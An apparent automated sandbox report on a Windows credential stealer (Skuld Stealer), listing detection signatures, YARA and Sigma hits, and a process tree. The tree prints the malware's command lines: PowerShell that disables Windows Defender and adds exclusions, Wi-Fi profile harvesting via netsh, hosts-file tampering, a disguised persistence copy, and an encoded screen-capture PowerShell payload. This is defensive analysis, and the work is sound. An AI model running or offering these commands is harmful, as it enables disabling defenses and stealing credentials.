Edit tour

Windows Analysis Report
TMPN.exe

Overview

General Information

Sample name:	TMPN.exe
Analysis ID:	1503182
MD5:	59a08bb8bf4881e814fd3d36f525da8a
SHA1:	3f542be6b20daef732a4c4bee9bad1dde8b375f0
SHA256:	03da816f34074a5e1941ababc4cbab2880d149a03b1b3b1000cf065479d50272
Tags:	exe
Infos:

Detection

Skuld Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Skuld Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies the hosts file

Potential dropper URLs found in powershell memory

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal communication platform credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Very long command line found

Abnormal high CPU Usage

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Execution of Powershell with Base64

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

TMPN.exe (PID: 2244 cmdline: "C:\Users\user\Desktop\TMPN.exe" MD5: 59A08BB8BF4881E814FD3D36F525DA8A)

conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 2760 cmdline: attrib +h +s C:\Users\user\Desktop\TMPN.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

attrib.exe (PID: 1600 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

WMIC.exe (PID: 2248 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5336 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

powershell.exe (PID: 5480 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

WMIC.exe (PID: 2532 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6704 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5448 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

powershell.exe (PID: 6956 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

WMIC.exe (PID: 6784 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

netsh.exe (PID: 5924 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

powershell.exe (PID: 6320 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 5916 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 5388 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB20.tmp" "c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

attrib.exe (PID: 6856 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

attrib.exe (PID: 2740 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

SecurityHealthSystray.exe (PID: 4920 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 59A08BB8BF4881E814FD3D36F525DA8A)

conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecurityHealthSystray.exe (PID: 3472 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 59A08BB8BF4881E814FD3D36F525DA8A)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
TMPN.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
TMPN.exe	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000011.00000000.2248250951.0000000001616000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000018.00000002.2358971472.0000000001616000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000018.00000000.2331278485.0000000001616000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000000.00000000.2121587219.0000000001076000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
Process Memory Space: TMPN.exe PID: 2244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TMPN.exe PID: 2244	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
Process Memory Space: SecurityHealthSystray.exe PID: 4920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecurityHealthSystray.exe PID: 4920	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
Process Memory Space: SecurityHealthSystray.exe PID: 3472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecurityHealthSystray.exe PID: 3472	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.TMPN.exe.260000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.TMPN.exe.260000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
17.0.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.0.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
24.2.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
17.2.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
0.2.TMPN.exe.260000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TMPN.exe.260000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
24.0.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.0.SecurityHealthSystray.exe.800000.0.unpack	JoeSecurity_SkuldStealer	Yara detected Skuld Stealer	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\TMPN.exe, ProcessId: 2244, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TMPN.exe", ParentImage: C:\Users\user\Desktop\TMPN.exe, ParentProcessId: 2244, ParentProcessName: TMPN.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, ProcessId: 5480, ProcessName: powershell.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TMPN.exe", ParentImage: C:\Users\user\Desktop\TMPN.exe, ParentProcessId: 2244, ParentProcessName: TMPN.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 6956, ProcessName: powershell.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBk